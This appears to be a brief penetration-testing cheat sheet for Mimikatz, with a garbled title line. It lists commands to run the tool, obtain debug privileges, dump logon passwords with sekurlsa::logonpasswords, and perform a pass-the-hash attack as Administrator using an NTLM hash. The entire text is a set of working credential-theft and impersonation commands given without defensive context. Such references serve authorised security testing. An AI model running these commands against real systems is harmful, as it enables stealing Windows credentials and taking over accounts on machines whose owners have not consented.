๐ŸฅMimikatz

Commands

Run

mimikatz.exe

Check Privileges

privilege::debug

Dump Passwords

sekurlsa::logonpasswords

Pass-The-Hash Attack

sekurlsa::pth /user:Administrator /domain:winxp /ntlm:<ntlm hash> /run:cmd

Last updated